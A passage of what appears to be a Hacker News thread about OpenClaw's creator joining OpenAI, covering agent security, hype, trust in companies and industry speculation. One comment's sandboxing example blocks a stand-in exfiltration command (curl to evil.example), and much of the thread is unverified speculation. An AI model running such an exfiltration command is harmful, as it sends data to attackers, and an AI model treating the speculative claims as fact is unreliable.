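    return json.loads(MEMORY.read_text()) if MEMORY.exists() else {}

def save_memory(mem: dict) -> None:
    MEMORY.write_text(json.dumps(mem))

def think(mem: dict, soul: str) -> dict:
    # Stand-in for a real model call; here we just count heartbeats.
    mem["beats"] = mem.get("beats", 0) + 1
    return mem

def heartbeat(ticks: int, interval: float = 0.0) -> None:
    # The agent 'works' on a timer even when nobody is chatting with it.
    soul = SOUL.read_text() if SOUL.exists() else "be helpful"
    for _ in range(ticks):
        mem = load_memory()
        mem = think(mem, soul)
        save_memory(mem)  # state written back each tick, so sessions can resume
        time.sleep(interval)
```

Because state lives on disk rather than in the process, killing and restarting the loop picks up where it left off, which is roughly the 'memory across sessions' trick; letting `think` rewrite `soul.md` would give you the self-editing config.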
On the other hand, if OpenClaw were structured as a SaaS, this entire project would have burned to the ground the first day it was launched.
So by releasing it as something you needed to run on your own hardware, the security requirement was reduced from essential, to a feature that some users would be happy to live without. If you were developing a competitor, security could be one feature you compete on--and it would increase the number of people willing to run your software and reduce the friction of setting up sandboxes/VMs to run it.
I don't need to think hard to speculate on what might go wrong here - will it answer spam emails sincerely? Start cancelling flights for you by accident? Send nuisance emails to notable software developers for their contribution to society[1]? Start opening unsolicited PRs on matplotlib?
The claims being shared by officials at the time were that anyone vaccinated was immune and couldn't catch it. Claims were similarly made that we needed roughly a 60% vaccination rate to reach herd immunity. With that precedent being set, it shouldn't matter whether one person chose not to mask up or get the jab; most everyone else could do so to fully protect themselves, and those who can't would only be at risk if more than 40% of the population weren't onboard with the masking and vaccination protocols.
Those claims disappeared rapidly when it became clear they offered some protection, and reduced severity, but not immunity.
People seem to be taking a lot more “lessons” from COVID than are realistic or beneficial. Nobody could get everything right. There couldn’t possibly be clear “right” answers, because nobody knew for sure how serious the disease could become as it propagated, evolved, and responded to mitigations. Converging on consistent shared viewpoints, coordinating responses, and working through various solutions to a new threat on that scale was just going to be a mess.
I'm in no way taking a side here on whether anyone should have chosen to get vaccinated or wear masks, only that the information at the time being pushed out from experts doesn't align with an after the fact condemnation of anyone who chose not to.
Do we know that 0.1% prevalence of "unvaccinated" AI agents won't already be terrible?
I may be out of touch, but I haven't heard about masks for measles, though it does spread through aerosol droplets so that would be a reasonable recommendation.
Personally I at least wish sick people would mask up on planes! Much more efficient than everyone else masking up or risking exposure.
I’m a broken record on this topic but it always comes back to liability.
Another aspect is that we have much higher expectations of machines than humans in regards to fault-tolerance.
At this scale of investment countries will have no problem cheapening the value of human life. It's part and parcel of living through another industrial revolution.
The main work he has done to enable a personal agent is his army of CLIs, like 40 of them.
The harness he used, pi-mono, is also a great choice because of its extensibility. I was working on a similar project (1) for the last few months with Claude Code, and it’s not really the best fit for a personal agent, and it’s pretty heavy.
Since I was planning to release my project as a Cloud offering, I worked mainly on sandboxing it, which turned out to be the right choice given OpenClaw is opensource and I can plug its runtime to replace Claude Code.
I decided to release it as opensource because at this point software is free.
This is the genius move at the core of the phenomenon.
While everyone else was busy trying to address safety problems, the OpenClaw project took the opposite approach: They advertised it as dangerous and said only experienced power users should use it. This warning seemingly only made it more enticing to a lot of users.
I’ve been fascinated by how well the project has just dodged and avoided any consequences for the problems it has introduced. When it was revealed that the #1 skill was malware masquerading as a Twitter integration I thought for sure there would be some reporting on the problems. The recent story about an OpenClaw bot publishing hit pieces seemed like another tipping point for journalists covering the story.
Though maybe this inflection point made it the most obvious time to jump off of the hype train and join one of the labs. It takes a while for journalists to sync up and decide to flip to negative coverage of a phenomenon after they cover its rise, but now it appears that the story has changed again before any narratives could build about the problems with OpenClaw.
OpenClaw showed what an "AI Personal Assistant" should be capable of. Now it's time to get it in a form-factor businesses can safely use.
The tech industry hasn't ever been about "building" in a pure sense, and I think we look back at previous generations with an excess of nostalgia. Many superior technologies have lost out because they were less profitable or marketed poorly.
> bad at identifying business trends
I think you’re being unduly harsh on yourself. At least by the Shopify/COVID example. COVID was a black swan event, which may very well have completely changed the fortunes of companies like Shopify when online commerce surged and became vital to the economy. Shortcomings, mismanagement and bad culture can be completely papered over by growth and revenue. Right place, right time. It’s too bad you missed out on some good fortune, but it’s a helpful reminder of how much of our paths are governed by luck. Thanks for sharing, and wishing you luck in the future.
Change is fraught with chaos. I don't think exuberant trends are indicators of whether we'll still care about secure and high quality software in the long term. My bet is that we will.
I don't believe skimming diffs counts as being left behind. Survivor bias etc. Furthermore, people are going to get burned by this (already have been, but seemingly not enough) and a responsible mindset such as yours will be valued again.
Something that's still up for grabs is figuring out how to go fully agentic in a responsible way. How do we bring the equivalent of skimming diffs to this?
i think the silver lining is that AI seems to be genuinely good at finding security issues, and maybe further down the line will be reliable enough to lean on somewhat. the middle period we're entering right now is super scary.
we want all the value, security be damned, and have no way to know about issues we're introducing at this breakneck speed.
still i'm hopeful we can figure it out somehow
and this is why they bought Peter. i’m betting he will come to regret it.
A security hole in a browser is an expected invariant not being upheld, like a vulnerability letting a remote attacker control your other programs, but it isn't a bug when a user falls for an online scam. What invariants are expected by anyone of "YOLO hey computer run my life for me thx"?
Nothing actually bad happened in this case and probably never will. Maybe some people have their crypto or identity stolen, but probably not at a rate significantly higher than background (lots of people are using openclaw).
https://www.shodan.io/search?query=http.favicon.hash%3A-8055...
Indeed they are, at least 20,432 people :)
So don’t feel bad. Everything on the internet is fake.
For less than the cost of 1 graphics card you can get enough people going that the rest of them will hop on board for free just to try and ride the wave.
Add a few LLM-generated comments that don't throw the product in your face but make sure it's always part of the conversation, so someone else can do it for you for free, and you're off to the races.
I will say openly: I don't get it and I used to argue for crypto use cases.
Making users happy > perfect security day one
Erm, is this some groundbreaking revelation?
It's always been that way, unless it's in the context of superior technology with minimal UI, à la Google Search in its early years.
Unfortunately, you just have to understand that this happens all over the place, and all you can really do is try to make your corner of the world a little better. We can’t make programmers use good security practices. We can’t make users demand secure software. We can at least try to do a better job with our own work, and educate people on why they should care.
But one thing to remember - our job is to figure out how to enable these amazing usecases while keeping the blast radius as low as possible.
Yes, OpenClaw ignores all security norms, but it's our job to figure out an architecture in which agents like these can have the autonomy they need to act, without harming the business too much.
So I would disagree our work is "on the way out", it's more valuable than ever. I feel blessed to be working in security in this era - there has never been a better time to be in security. Every business needs us to get these things working safely, lest they fall behind.
It's fulfilling work, because we are no longer a cost center. And these businesses are willing to pay - truly life changing money for security engineers in our niche.
> What I want is to change the world, not build a large company and teaming up with OpenAI is the fastest way to bring this to everyone.
do not make me feel all warm and fuzzy: yeah, changing the world with Thiel's money. Try joining a union instead.
Ever since I was four, I've dreamed of doing my part to bring that about.
Whatever the origins of the term, it now seems clear it’s kind of the direction things are going.
Throughout the conversation he speculated on some truly bizarre possible futures, including an oligarchic takeover by billionaires with private armies following the collapse of the USA under Trump. What weirded me out was how oddly specific he got about all the possible futures he was speculating about that all ended with Thiel, Musk, and friends as feudal lords. Either he thinks about it a lot, or he overhears this kind of thing at the ultracapitalist soirées he's been going to.
Guess I’ll have to get a Samurai sword soon and pivot to high stakes pizza delivery.
There are a disturbing amount of parallels between Elon and L Bob Rife.
It’s really disturbing that we have oligarchs trying to eagerly create a cyberpunk dystopia.
OpenAI has tried a lot of experiments over the years - custom GPTs, the Orion browser, Codex, the Sora "TikTok but AI" app, and all have either been uninspired or more-or-less clones of other products (like Codex as a response to Claude Code).
OpenClaw feels compelling, fresh, sci-fi, and potentially a genuinely useful product once matured.
More to the point, OpenAI needs _some_ kind of hyper-compelling product to justify its insane hype, valuation, and investments, and Peter's work with OpenClaw seems very promising.
(All of this is complete speculation on my part. No insider knowledge or domain expertise here.)
Like, why doesn’t OpenAI build tax filing into ChatGPT? That’s like the immediate use case for LLM-based app development.
Legal liability.
Atlas is OpenAI's browser
This product should never have seen the light of day, at least not for the general public. The amount of slop that is now floating across Tiktok, YT Shorts and Instagram is insane. Whenever you see a "cute animals" video, 99% of it is AI generated - and you can report and report and report these channels over and over, and the platforms don't care at all, but instead reward the slop creators from all the comments shouting that this is AI garbage and people responding they don't care because "it's cute".
OpenAI completely lacks any sort of ethical review board, and now we're all suffering from it.
And most people I know who love spending time on this kind of content would not care either - because they don't care whether they waste time on real or AI animal videos. They just want something to waste time with.
Yes indeed. I do love me some cat and bunny videos. But I hate getting fed slop - and it's not just cat videos by the way. I'm (as evidenced by my comment history) into mechanics, electronics and radio stuff, and there are so damn many slop channels spreading outright BS with AI hallucinated scripts that it eventually gets really really annoying. Sadly, YT's algorithm keeps feeding me slop in every topic that interests me and frankly it's enraging, as some of my favorite legitimate creators like shorts as a format so I don't want to completely hide shorts.
> And most people I know who love spending time on this kind of content would not care either - because they don't care whether they waste time on real or AI animal videos. They just want something to waste time with.
The problem is, these channels build up insane amounts of followers. And it would not be the first time that these channels then suddenly pivot (or get sold from one scam crew to the next) and spread disinformation, crypto scams and other fraud - it was and is a hot issue on many social media platforms.
Of course the S in openclaw is for security.
It has been interesting to watch this take off. It wasn't the first or even best agent framework and it deliberately avoided all of the hard problems that others were trying to solve, like security.
What it did have was unnatural levels of hype and PR. A lot of that PR, ironically, came from all of the things that were happening because it had so many problems with security and so many examples of bad behavior. The chaos and lack of guardrails made it successful.
Seriously, I just don't understand what's going on. To me it looks like the whole world has just gone crazy.
Reminds me of 30 years ago.
The feature set is pretty simple:
- Agents that can write their own tools.
- Agents that can write their own skills.
- Agents that can chat via standard chat apps.
- Agents that can install and use cli software.
- Agents that can have a bit of state on disk.
Yet I’ve known many people who have said it is difficult to use; this was a 0.01-0.1% adoption tool. There is still a huge ease of use gap to cross to make it adopted in 10-50% of computer users.
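A sketch of the first bullet above, agents writing their own tools. The names here (`write_tool`, `run_tool`, the `run()` entry point) are made up for illustration, and a real harness would sandbox generated code before executing it:

```python
import importlib.util
from pathlib import Path

TOOLS_DIR = Path("tools")  # hypothetical directory of agent-authored tools

def write_tool(name: str, source: str) -> Path:
    # The agent persists model-generated code as a new tool on disk.
    TOOLS_DIR.mkdir(exist_ok=True)
    path = TOOLS_DIR / f"{name}.py"
    path.write_text(source)
    return path

def run_tool(name: str, *args):
    # Load the generated module and call its run() entry point.
    path = TOOLS_DIR / f"{name}.py"
    spec = importlib.util.spec_from_file_location(name, path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod.run(*args)

# e.g. the model emits a tiny adder tool, and the agent can now reuse it
write_tool("adder", "def run(a, b):\n    return a + b\n")
```

Once a tool exists on disk it outlives the session, which is how a pile of 40-odd small CLIs accumulates.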
do you think the agent admin ui mattered at all?
other contributors while i think of them:
- good timing around opus 4.6 as the default model? (i know he used codex, but willing to bet the majority of openclaws are opuses)
- make immediate wins for nontechnical users. everyone else was busy chasing cursor/cognition or building horizontal stuff like turbopuffer or whatever. this one was straight up "hook up a good bot to telegram"
- there's many attempts at "personal OS" / "assistant" products, but no good open source ones? a lot of sketchier Chinese ones; this was the first western one
There are very few companies who I trust with my digital data and thus trust to host something like OpenClaw and run it on my behalf: American Express, Capital One, maybe Proton, and *maybe* Apple. I managed an AI lab team at Capital One and personally I trust them.
I am for local compute, private data, etc., but for my personal AI assistant I want something so bulletproof that I lose not a minute of sleep worrying about my data. I don't want to run the infrastructure myself, but a hybrid solution would also be good.
A company like AMD I would trust more than a company like Apple.
I honestly can’t name a single one I know of who could pass that criteria
Edit:found your other comment answering a similar question
SECURITY
PRIVACY
---
Heyyy it never said "good privacy" perceive as you want...
Don't publicly acknowledge that you were the reason someone got murdered and 1000 VIPs got hacked.
One day, when I'm deemed a 'Baddie', I'll look to Apple as inspiration.
So that rules out Apple.
A leadership team that is very open and involved with the community, and one that takes extra steps, compared to competitors, to show they take privacy seriously.
and make sure the member/owners are all of like mind, and willing to pay more to ensure security and privacy
I had assumed I'd have to lean more on the capitalistic values of being a co-op, like better rates for our clients, higher quality work, larger likelihood of our long term existence to support our work, more project ownership, so as to make the pitch palatable to clients. Turns out clients like the soft pitch too, of just workers owning the company they work within - I've had several clients make contact initially because they bought the vision over the sales pitch.
I'm trying to think about if I'd trust us more to set up or host openclaw than a VC funded startup or an establishment like Capital One. I think both alternatives would have way more resources at hand, but I'm not sure how that would help outside of hiring pentesters or security researchers. Our model would probably be something FOSS that is keyed per-user, so if we were popular, imo that would be more secure in the end.
The incentives leading to trust is definitely in a co-op's favor, since profit motive isn't our primary incentive - the growth of our members is, which isn't accomplished only through increasing the valuation of the co-op. Members also have total say in how we operate, including veto power, at every level of seniority, so if we started doing something naughty with customer data, someone else in the org could make us stop.
This is our co-op: 508.dev, but I've met a lot of others in the software space since founding it. I think co-ops in general have legs, the only problem is that it's basically impossible to fund them in a way a VC is happy with, so our only capitalization option is loans. So far that hasn't mattered, and that aligns with the goal of sustainable growth anyway.
Yes, agreed for the USA/Taiwan/Japan where we mostly operate. For us it's been understanding and leveraging the alternative resources we have. Like, we have a lot of members, but really only a couple are bringing in customers, despite plenty of members having very good networks.
Is your current company a co-op? 200+ sales at 30k a pop seems to be pretty well off the ground!
Exactly what I said. We need lower shareholder interference, not more, and in a co-operative it's the opposite.
> with immediate liability for their person.
What do you mean?
If, as a shareholder operator, a co-op member pressured themselves to exploit user data to turn a quick buck, I guess that's possible, but likely they'd be vetoed by other members who would get sucked into the shitstorm.
In my experience, co-op members and customers are more value-oriented than profit-motivated, within reason.
Effectively you can trust all of the companies out there right up until they are acquired and then you will regret all of the data you ever gave them. In that sense Facebook is unique: it was rotten from day #1.
Vehicles: anything made before 2005, SIM or e-SIM on board = no go.
I'm halfway towards setting up my own private mail server and IRC server for me and my friends and kissing the internet goodbye. It was a fun 30 years but we're well into nightmare territory now. Unfortunately you are now more or less forced to participate because your bank, your government and your social circle will push you back in. And I'm still pissed off that I'm not allowed to host any servers on a residential connection. That's not 'internet connectivity' that's 'consumer connectivity'.
Every day my doomer sentiment deepens, and I am ashamed when I come onto here and see all this optimism. It is refreshing to see people whose opinions I have come to respect on this forum to be as negative as I am.
Such as?
These aloof comments that talk about something we're supposed to know about without referencing anything are very unhelpful.
It's a pity, they were doing well for a long time.
I'm surprised that someone on HN would paint all of HN with the same brush.
It's one of those 'lesser evils' things. If you know of a better email provider I'd love to know.
( https://www.lemonade.com/fsd is an example )
You only get offered a discount if most other customers are being compelled to pay full (or even increased) prices for the same offering. Otherwise revenue goes down and company leadership finds itself finding other ways to cut costs and increase profits.
After reading Jacques's response to my question, my list got smaller. Personally, I still like Proton, but I get that they have made some people unhappy. I also agree that Hetzner is a reliable provider; I have used them a bunch of times in the last ten years.
Then my friend, we have to worry about fiber/network providers I suppose.
This general topic is outside my primary area of competence, so I just have a loose opinion of maintaining my own domain, use encryption, and being able switch between providers easily.
I would love to see an Ask HN on secure and private agentic infra + frameworks.
I don't really understand what this has to do with the post or even OpenClaw. The big draw of OpenClaw (as I understand it) was that you could run it locally on your own system. Supposedly, per this post, OpenClaw is moving to a foundation and they've committed to letting the author continue working on it while on the OpenAI payroll. I doubt that, but it's a sign that they're making it explicitly not an OpenAI product.
OpenClaw's success and resulting PR hype explosion came from ignoring all of the trust and security guardrails that any big company would have to abide by. It would be a disaster of the highest order if it had been associated with any big company from the start. Because it felt like a grassroots experiment all of the extreme security problems were shifted to the users' responsibility.
It's going to be interesting to see where it goes from here. This blog post is already hinting that they're putting OpenClaw at arm's length by putting it into a foundation.
With any luck, maybe this will finally be a bridge too far, like what Amazon's Super Bowl ad did for the conversation around surveillance.
My trust does not extend that far.
Lol
Their marketing team got ya.
I aspire to be as good as Apple at marketing. Who knew 2nd or worse place in everything doesn't matter when you are #1 in marketing?
It took all of Peter’s time to move it forward, even with maintainers (who he complained got immediately hired by AI companies).
Now he’s gonna be working on other stuff at OpenAI, so OpenClaw will be dead real quick.
Also, I was following him for his AI coding experience even before the whole OpenClaw thing; he’ll likely stop posting about his experiences working with AI as well.
As per the new terms of service, the ads are already in
My guess is this guy has taken a job for maybe $1M, effectively handing over the crown jewels to Altman for nothing.
OpenAI must be laughing their heads off.
Beads and blankets.
MongoDB – ~30 B USD
Docker – Private (~2+ B USD last valuation)
Redis Ltd. – Private (~2 B USD last valuation)
Grafana Labs – Private (~6 B USD last valuation)
Confluent (Apache Kafka) – ~11 B USD
Cloudera (Apache Hadoop) – 5.3 B USD (acquired)
SUSE Linux – ~2.5 B USD
Red Hat – 34 B USD (acquired)
HashiCorp – 6.4 B USD (acquired)
lol. what?
OpenAI has two real competitors: Anthropic in the enterprise space and Google in the consumer space. Google fell far behind early on and ceded a lot of important market share to ChatGPT. They're catching up, but the runaway success of ChatGPT provides OpenAI with a huge runway among consumers.
In the enterprise space, OpenAI's partnership with Microsoft has been a gold mine. Every company on the planet has a deep relationship with Microsoft, so being able to say "hey just add this to your Microsoft plan" has been huge for OpenAI.
The thing about enterprise is the stakes are high. Every time OpenAI signals that they're not taking AI safety seriously, Anthropic pops another bottle of champagne. This is one of those moments.
Again, I doubt it matters much either way, but if OpenAI does end up blowing up, decisions like this will be in the large pile of reasons why.
Claiming Dario is the bad guy in any context is a tough characterization to agree with if you've seen even a fraction of one interview with him.
To stay on point, though: OpenAI hiring the OpenClaw creator does seem to lean away from a serious enterprise benefit and towards a more consumer-based tack, which is a curious business move considering the original comment's perspective on OpenAI.
I don't know if you'll achieve that at OpenAI or if it'll even be a good change for the world, but I genuinely wish you the best. Regardless of the news around OpenAI I still think it's great that a personal project got you a position at a company like that.
Sounds like a threat - "I'm joining OpenSkynetAI to bring AI agents onto your hard disk too!"
Add in databases, browser use, and the answer could be yes
This could be the most disruptive software we have seen
Are you making anyone's life better? Who will even pay you once most jobs are automated?
At best, it's a defensive move: make money, get hard capital and seek rent after most of society has collapsed?
Deindustrialization happened 20-40 years ago and the affected regions are still hit hard.
Also, you're making my point. Utterly heartless.
In the past, people wanting to sign a juicy contract at a FAANG were told to spend hours everyday on Leetcode.
Now? Just spend tokens until you build something that gets enough traction to be seen by one of the big labs!
It just happened that this one latched onto a trend well and went viral; the cease and desist over its name only accelerated the virality.
Regarding OpenClaw's hype, it is not about how you access it but rather what the agents can access from you, and no one did that before. Probably because no one had the balls to put such an insecure piece of software out in the wild.
Anyone working for OpenAI is complicit with these abuses. I hope that in due time having OpenAI on your resume will be a strong negative signal.
We can assume first that at OpenAI he's going to build the hosted safe version that, as he puts it, his mum can use. Inevitably at some point he and colleagues at OpenAI will discover something that makes the agent much more effective.
Does that insight make it into the open version? Or stay exclusive to OAI?
(I imagine there are precedents for either route.)
The cry has been for a while that LLMs need more data to scale.
The new Open(AI)Claw could be cheap or free, as long as you tick the box that allows them to train on your entire inbox and all your documents.
This isn't a Slay The Spire reference is it?
OpenAI is putting money where their mouth is: a one-man team can create a vibe-coded project, and score big.
Open-source, and hyped incredibly well.
Interesting times ahead as everyone else chases this new get-rich-quick scheme. Will be plentiful for the shovel makers.
Peter single handedly got many of us taking Codex more seriously, at least that's my impression from the conversations I had. Openclaw has gotten more attention over the past 2 weeks than anything else I can think of.
Depending on how this goes, this could be to OpenAI what Instagram was to Facebook. FB bought Instagram for $1 billion, and it's now estimated to be worth hundreds of billions.
Total speculation based on just about zero information. :)
Comments like this feel confusing because I didn't have any association between Codex and OpenClaw before reading your comment.
Codex was also seeing a lot of usage before OpenClaw.
The whole OpenClaw hype bubble feels like there's a world of social media that I wasn't tapped into last month that OpenClaw capitalized on with unparalleled precision. There are many other agent frameworks out there, but OpenClaw hit all the right notes to trigger the hype machine in a way that others did not. Now OpenClaw and its author are being credited with so many other things that it's hard for me to understand how this one person inserted himself into the center of the media zeitgeist.
I’m questioning how some people in that bubble came to believe he was at the center of that universe. He wasn’t the only person talking about the differences between Codex and Claude. Most of the LLM people I follow had their own thoughts and preferences that they advertised too.
If openai had done it themselves, immediate backlash.
OpenClaw and Claude Code aren't solving the same problems. OpenClaw was about having a sandbox, connecting it to a messenger channel, and letting it run wild with tools you gave it.
People would wake up to their agent having built something cool the night before or automate their workflow without even asking for it.
OpenClaw was about having the agent operate autonomously, including initiating its own actions and deciding what to do. Claude Code was about waiting for instructions and presenting results.
“Just SSH into Claude Code” is like the famous HN comment that didn’t understand why anyone was interested in Dropbox because you could do backups with shell scripts.
There is not much novel about OpenClaw. Anybody could have thought of this or done it. The reason people have not released an agent that would run by itself, edit its own code and be exposed to the internet is not that it's hard or novel - it's because it is an utterly reckless thing to do. No responsible corporate entity could afford to do it. So we needed someone with little enough to lose, enough skill and willing to be reckless enough to do it and release it openly to let everyone else absorb the risk.
I think he's smart to jump on the job opportunity here because it may well turn out that this goes south in a big way very fast.
To be fair, when used in retrospect, this applies to just about any big tech company
Bringing unblockable ads to the masses. Roger that.
Normally, an app like this would have had a dozen or so people behind it, all acquihired by OpenAI to find the people who really drove the project.
With AI, it's one person who builds and takes everything.
Acquihires haven't worked that way for a while. The new acquihire game is to buy out a few key execs and then have them recruit away the key developers, leaving the former company as a shell for someone else to take over and try to run.
Also OpenClaw was not a one-person operation. It had several maintainers working together.
https://web.archive.org/web/20260215220749/https://steipete....
The sandboxing part matters more than people think. Giving an LLM a browser with full network access and no isolation is a real security problem that most projects in this space hand-wave away.
Multi-provider LLM support (OpenAI, Anthropic, DeepSeek, open-weight models via vLLM). In production with paying customers.
Happy to answer architecture questions.
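To make the sandboxing point concrete, here is a minimal sketch of tool-call gating: an executable allowlist plus subprocess isolation. The `run_tool` dispatcher and the `ALLOWED_TOOLS` set are hypothetical names for illustration, not any particular framework's API; real isolation (network namespaces, containers) would sit on top of this.

```python
import shlex
import subprocess
import tempfile

# Hypothetical allowlist: the agent may only invoke these binaries.
ALLOWED_TOOLS = {"ls", "cat", "grep"}

def run_tool(command: str, timeout: float = 5.0) -> str:
    """Run an agent-requested command under minimal guardrails: an
    executable allowlist, a throwaway working directory, a scrubbed
    environment, and a hard timeout. Network isolation would need
    OS-level sandboxing on top of this."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_TOOLS:
        raise PermissionError(f"tool not allowed: {argv[:1]}")
    with tempfile.TemporaryDirectory() as workdir:
        result = subprocess.run(
            argv,
            cwd=workdir,                        # agent never sees the real cwd
            env={"PATH": "/usr/bin:/bin"},      # no inherited secrets or tokens
            capture_output=True,
            text=True,
            timeout=timeout,                    # runaway tools get killed
        )
    return result.stdout

# Anything outside the allowlist is rejected before it ever executes.
try:
    run_tool("curl http://evil.example/exfil")
except PermissionError as e:
    print("blocked:", e)
```

The key property is that the check happens before execution, so the model's output is never trusted directly.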
The guy is creative, but this is really just following the well known pattern of acquiring/hiring bright minds if only to prevent your competition from doing the same.
Big Tech can't release software this dangerous and then figure out how to make it secure. For them it would be an absolute disaster and could ruin them.
What OpenClaw did was show us the future, give us a taste of what it would be like and had the balls to do it badly.
Technology is often pushed forward by ostensibly bad ideas (like telnet) that carve a path through the jungle and let other people create roads after.
I don't get the hate towards OpenClaw, if it was a consumer product I would, but for hackers to play around to see what is possible it's an amazing (and ridiculously simple) idea. Much like http was.
If you connected to your bank account via telnet in the 1980s or plain http in the 90s or stored your secrets in 'crypt' well, you deserved what you got ;-) But that's how many great things get started, badly, we see the flaws fix them and we get the safe version.
And that I guess is what he'll get to do now.
* OpenClaw is a straw man for AGI *
The real gem inside OpenClaw is pi, the agent, created by Mario Zechner. Pi is by far the best agent framework in the world. Most extensible, with the best primitives.
Armin Ronacher, creator of Flask, can go deep and make something like OpenClaw enterprise-ready.
The value of Peter is in connecting the dots, thinking from the user's perspective, and bringing a business perspective.
The trio are friends and have together vibecoded vibetunnel.
Sam Altman, if you are reading this: get Mario and Armin today.
Personally I'm excited to see what he can do with more resources, OpenClaw clearly has a lot of potential but also a lot of improvements needed for his mum to use it.
You work for OpenAI now. You don't have to worry about safety anymore.
The creator built a powerful social media following and capitalized on that. Fair play.
No company could ship anything like OpenClaw as a product because it was a million footguns packaged with a self-installer and a couple warnings that it can't be trusted for anything.
There's a reason they're already distancing themselves from it and saying it's going to an external foundation
In spite of that, it’s incredibly obvious OpenClaw was pushed by bots across pretty much every social media platform and that’s weird and unsettling.
Honestly, Anthropic really dropped the ball here. They could have had such an easy integration and gained invaluable research data on how people actually want to use AI — testing workflows, real-world use cases, etc. Instead, OpenAI swoops in and gets all of that. Massive missed opportunity.
money or morals, choose one
Please dispense with the “change the world” bullshit.
I understand that it’s healthy to celebrate your personal victories but in this context with this bro going to OpenAI to make 7 figures, maaaan I don’t think this guy needs our clicks.
On top of that there’s a better than 50% chance OpenAI suffocates the open source project and the alternative will be a paid privacy nightmare.
The future is both amazing and shitty.
Hope OpenClaw continues to evolve. It is indeed an amazing piece of work.
And I hope sama doesn't get his grubby greedy hands on OpenClaw.
Once my Olares One is here, will also be using local LLMs on open models.
I'm assuming there's a typo here, because I can't imagine a flight from LAX to SKO at all, let alone one that goes anywhere close to Honolulu. But I can't figure out what this was supposed to be.
Props to this guy for scamming Altman this hard without writing a single line of code, or really doing anything at all other than paying for a bunch of github stars and tweets/blogposts from fellow grifters.
Thank you, we're already fucked. I am a hypocrite, of course.
This is a vibe coded agent that is replicable in little time. There is no value in the technology itself. There is value in the idea of personal agents, but this idea is not new.
The value is in the hype, from the perspective of OpenAI. I believe they are wrong (see next points)
We will see a proliferation of personal agents. For a short time, the money will be in API usage, since those agents burn a lot of tokens, often for results that could be obtained more directly without a generic assistant. At the current stage, poorly orchestrated and directed, barely prompted or steered, they achieve results by brute force.
Whoever creates the LLM that is best at following instructions in a sensible way and at coordinating long-running tasks will reap the greatest benefit, regardless of whether OpenClaw is under OpenAI's umbrella or not.
Claude Opus is currently the agent that works best for this use case. It is likely that this will help Anthropic more than OpenAI. It is wise, for Anthropic, to avoid burning money on an easily replicable piece of software.
Those hypes are forgotten as fast as they are created. Remember Cursor? And it was much more a true product than OpenClaw.
Soon, personal agents will be one of the fundamental products of AI vendors, integrated in your phone, nothing to install, part of the subscription. All this will be irrelevant.
In the mean time, good for the guy that extracted money from this gold mine. He looks like a nice person. If you are reading this: congrats!
(throwaway account for obvious reasons)
of course--i use it every day. are you implying Cursor is dead? they raised $2B in funding 3 months ago and are at $1B in ARR...
But base VS Code is fine for that too
Who?
> are you implying Cursor is dead? they raised $2B in funding 3 months ago and are at $1B in ARR
That is the problem. It doesn't matter about how much they raised. That $2B and that $1B is paying the supplier Anthropic and OpenAI who are both directly competing against them.
Cursor is operating on thin margins and continues to lose money. It's made worse by the fact that people are leaving Cursor for Claude Code.
In short, Cursor is in trouble and they are funding their own funeral.
Whoever stands in front of the customer ultimately wins. The rest are just cost centers.
This fucking guy will fit right in at OpenAI.
Good for him, but no particular genius involved.
The reason is that he paid every AI "influencer" to promote it. Within the span of a week, the project went from being completely unknown to every single techbro jumping on it as the next "thing that will change the world". It also gained around 70k github stars in that time.
In the age of AI, everything is fake.
We're working on security and about 3 very key architectural improvements.
We detached this subthread from https://news.ycombinator.com/item?id=47028331.
Please don't create accounts to break HN's rules with.
https://news.ycombinator.com/newsguidelines.html
Edit: since this account has been posting almost exclusively flamebait and ideological/political battle comments, I've banned it. Please don't create accounts to break HN's rules with—it will eventually get your main account banned as well.
Relatedly, this person's entire post history is full of weird hate rhetoric. Why allow them to continue having comment privileges on the site? It seems all they do is provoke.
Edit: picture is from a Vienna meet up. Not OpenAI.
There is literally no need to shit on ur mom like that. Sorry your mom sucks at tech but can we please stop using this as a euphemism?
AFAIK Anthropic won't let projects use the Claude Code subscription feature, but actually pushes those projects to the Claude Code API instead.
What’s fascinating is the pattern we’re seeing lately: people who explored the frontier from the outside now moving inside the labs. That kind of permeability between open experimentation and foundational model companies seems healthy.
Curious how this changes the feedback loop. Does bringing that mindset in accelerate alignment between tooling and model capabilities — or does it inevitably centralize more innovation inside the labs?
Either way, congrats. The ecosystem benefits when strong builders move closer to the core.
I would expect someone who "strikes gold" like this in a solo endeavor to raise money, start a company, hire a team. Then they have to solve the always challenging problem of how to monetize an open-source tool. Look at a company like Docker: they've been successful, but they didn't capture more than a small fraction of the commercial revenue that the entire industry has paid to host the product they developed and maintain. Their peak valuation was over a billion dollars, but who knows by the time all is said and done what they'll be worth when they sell or IPO.
So if you invent something that is transformative to the industry you might work really hard for a decade and if you're lucky the company is worth $500M, if you can hang onto 20% of the company maybe it's worth $100M.
Or, you skip the decade in the trenches and get acqui-hired by a frontier lab who allegedly give out $100M signing bonuses to top talent. No idea if he got a comparable offer to a top researcher, but it wouldn't be unreasonable. Even a $10M package to skip a decade of risky & grueling work if all you really want to do is see the product succeed is a great trade.
The deeper issue is that agent frameworks run straight into formal limits (Gödel/Turing-style): once planning and execution are non-deterministic, you lose reproducibility, auditability, and guarantees. You can wrap that with guardrails, but you can’t eliminate it. That’s why these tools demo well but don’t become foundations. Serious systems still keep LLMs at the edges and deterministic machinery in the core.
Meta: this comment itself was drafted with ChatGPT’s help — which actually reinforces the point. The model didn’t decide the thesis or act autonomously; a human constrained it, evaluated it, and took responsibility. LLMs add real value as assistive tools inside a deterministic envelope. Remove the human, and you get the exact failure modes people keep rediscovering in agent frameworks.
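The "deterministic envelope" above can be sketched as a validation gate between the model's free-form output and the system that acts on it. The action names and schema here are hypothetical, purely for illustration:

```python
import json

# Hypothetical action schema: the only operations the surrounding
# system will ever execute, regardless of what the model emits.
ALLOWED_ACTIONS = {
    "search": {"query"},
    "read_file": {"path"},
}

def validate_action(model_output: str) -> dict:
    """Deterministic gate on a model's proposed action. Anything that
    is not well-formed JSON naming a known action with exactly the
    expected fields is rejected, so every executed step stays
    reproducible and auditable."""
    try:
        action = json.loads(model_output)
    except json.JSONDecodeError:
        raise ValueError("not valid JSON")
    name = action.get("name")
    args = action.get("args", {})
    if name not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action: {name!r}")
    if set(args) != ALLOWED_ACTIONS[name]:
        raise ValueError(f"bad arguments for {name}: {sorted(args)}")
    return action

# A well-formed proposal passes; anything else is refused up front.
ok = validate_action('{"name": "search", "args": {"query": "openclaw"}}')
print(ok["name"])
```

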